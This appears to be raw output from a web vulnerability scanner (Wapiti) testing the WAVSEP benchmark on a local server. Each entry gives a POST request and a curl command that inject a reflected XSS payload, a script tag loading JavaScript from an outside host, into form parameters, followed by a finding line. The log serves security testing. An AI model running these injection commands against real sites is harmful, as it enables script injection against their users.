POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp Content-Type: application/x-www-form-urlencoded userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwvvd8pzx49z.js%3E%3C%2Fscript%3E&userinput2=default
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp" -d "userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwvvd8pzx49z.js%3E%3C%2Fscript%3E&userinput2=default"
XSS vulnerability found via injection in the parameter userinput2
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp Content-Type: application/x-www-form-urlencoded userinput=default&userinput2=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwm34rqrl5zz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp" -d "userinput=default&userinput2=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwm34rqrl5zz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case32-Tag2HtmlPageScopeValidViewstateRequired.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case32-Tag2HtmlPageScopeValidViewstateRequired.jsp Content-Type: application/x-www-form-urlencoded userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwiqrqurotpz.js%3E%3C%2Fscript%3E&__VIEWSTATE=%2FwEPDwUENTM4MWRkhsjF%2B62gWnhYUcEyuRwTHxGDVzA%3D
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case32-Tag2HtmlPageScopeValidViewstateRequired.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case32-Tag2HtmlPageScopeValidViewstateRequired.jsp" -d "userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwiqrqurotpz.js%3E%3C%2Fscript%3E&__VIEWSTATE=%2FwEPDwUENTM4MWRkhsjF%2B62gWnhYUcEyuRwTHxGDVzA%3D"
XSS vulnerability found via injection in the parameter orderby
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-With200Errors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-With200Errors.jsp Content-Type: application/x-www-form-urlencoded orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwo9h5jmp06z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-With200Errors.jsp" -d "orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwo9h5jmp06z.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter transactionId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case06-InjectionInView-Numeric-PermissionBypass-With200Errors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case06-InjectionInView-Numeric-PermissionBypass-With200Errors.jsp Content-Type: application/x-www-form-urlencoded transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwsksyxpjmjz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case06-InjectionInView-Numeric-PermissionBypass-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case06-InjectionInView-Numeric-PermissionBypass-With200Errors.jsp" -d "transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwsksyxpjmjz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter msgId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case07-InjectionInSearch-Numeric-UnionExploit-With200Errors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case07-InjectionInSearch-Numeric-UnionExploit-With200Errors.jsp Content-Type: application/x-www-form-urlencoded msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwyz2fwqfuaz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case07-InjectionInSearch-Numeric-UnionExploit-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case07-InjectionInSearch-Numeric-UnionExploit-With200Errors.jsp" -d "msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwyz2fwqfuaz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter minBalanace
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case08-InjectionInCalc-Numeric-BooleanExploit-With200Errors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case08-InjectionInCalc-Numeric-BooleanExploit-With200Errors.jsp Content-Type: application/x-www-form-urlencoded minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwqhjmj69f6z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case08-InjectionInCalc-Numeric-BooleanExploit-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case08-InjectionInCalc-Numeric-BooleanExploit-With200Errors.jsp" -d "minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwqhjmj69f6z.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter msgid
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case09-InjectionInUpdate-Numeric-CommandInjection-With200Errors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case09-InjectionInUpdate-Numeric-CommandInjection-With200Errors.jsp Content-Type: application/x-www-form-urlencoded msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3v14uuscrz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case09-InjectionInUpdate-Numeric-CommandInjection-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case09-InjectionInUpdate-Numeric-CommandInjection-With200Errors.jsp" -d "msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3v14uuscrz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter orderby
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-With200Errors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-With200Errors.jsp Content-Type: application/x-www-form-urlencoded orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw1ebm5klhzz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-With200Errors.jsp" -d "orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw1ebm5klhzz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter transactionDate
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-With200Errors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-With200Errors.jsp Content-Type: application/x-www-form-urlencoded transactionDate=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwgpljk9saxz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-With200Errors.jsp" -d "transactionDate=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwgpljk9saxz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter transactionId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-With200Errors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-With200Errors.jsp Content-Type: application/x-www-form-urlencoded transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw66laro8jnz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-With200Errors.jsp" -d "transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw66laro8jnz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter msgId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-With200Errors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-With200Errors.jsp Content-Type: application/x-www-form-urlencoded msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw266v6qgb4z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-With200Errors.jsp" -d "msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw266v6qgb4z.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter minBalanace
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-With200Errors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-With200Errors.jsp Content-Type: application/x-www-form-urlencoded minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwt4twjyejlz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-With200Errors.jsp" -d "minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwt4twjyejlz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter msgid
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-With200Errors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-With200Errors.jsp Content-Type: application/x-www-form-urlencoded msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwjeb1r43qaz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-With200Errors.jsp" -d "msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwjeb1r43qaz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter orderby
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-With200Errors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-With200Errors.jsp Content-Type: application/x-www-form-urlencoded orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwxo2i6xe63z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-With200Errors.jsp" -d "orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwxo2i6xe63z.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter transactionId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case06-InjectionInView-Numeric-PermissionBypass-With200Errors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case06-InjectionInView-Numeric-PermissionBypass-With200Errors.jsp Content-Type: application/x-www-form-urlencoded transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwjynsj5hahz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case06-InjectionInView-Numeric-PermissionBypass-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case06-InjectionInView-Numeric-PermissionBypass-With200Errors.jsp" -d "transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwjynsj5hahz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter msgId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case07-InjectionInSearch-Numeric-UnionExploit-With200Errors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case07-InjectionInSearch-Numeric-UnionExploit-With200Errors.jsp Content-Type: application/x-www-form-urlencoded msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw9yteu1jllz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case07-InjectionInSearch-Numeric-UnionExploit-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case07-InjectionInSearch-Numeric-UnionExploit-With200Errors.jsp" -d "msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw9yteu1jllz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter minBalanace
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case08-InjectionInCalc-Numeric-BooleanExploit-With200Errors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case08-InjectionInCalc-Numeric-BooleanExploit-With200Errors.jsp Content-Type: application/x-www-form-urlencoded minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3aifg34fxz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case08-InjectionInCalc-Numeric-BooleanExploit-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case08-InjectionInCalc-Numeric-BooleanExploit-With200Errors.jsp" -d "minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3aifg34fxz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter msgid
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case09-InjectionInUpdate-Numeric-CommandInjection-With200Errors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case09-InjectionInUpdate-Numeric-CommandInjection-With200Errors.jsp Content-Type: application/x-www-form-urlencoded msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwmoiwayn6z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case09-InjectionInUpdate-Numeric-CommandInjection-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case09-InjectionInUpdate-Numeric-CommandInjection-With200Errors.jsp" -d "msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwmoiwayn6z.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter orderby
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-With200Errors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-With200Errors.jsp Content-Type: application/x-www-form-urlencoded orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwtv78t0v0cz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-With200Errors.jsp" -d "orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwtv78t0v0cz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter transactionDate
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-With200Errors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-With200Errors.jsp Content-Type: application/x-www-form-urlencoded transactionDate=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwpswn84yyoz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-With200Errors.jsp" -d "transactionDate=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwpswn84yyoz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter transactionId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-With200Errors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-With200Errors.jsp Content-Type: application/x-www-form-urlencoded transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwr73xpf9p9z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-With200Errors.jsp" -d "transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwr73xpf9p9z.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter msgId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-With200Errors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-With200Errors.jsp Content-Type: application/x-www-form-urlencoded msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwpynjnhj6fz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-With200Errors.jsp" -d "msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwpynjnhj6fz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter minBalanace
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-With200Errors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-With200Errors.jsp Content-Type: application/x-www-form-urlencoded minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw0q50jsh2wz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-With200Errors.jsp" -d "minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw0q50jsh2wz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter msgid
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-With200Errors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-With200Errors.jsp Content-Type: application/x-www-form-urlencoded msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw0nxq5wlghz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-With200Errors.jsp" -d "msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw0nxq5wlghz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case01-Redirect-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case01-Redirect-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwk2si7q5n4z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case01-Redirect-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case01-Redirect-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwk2si7q5n4z.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
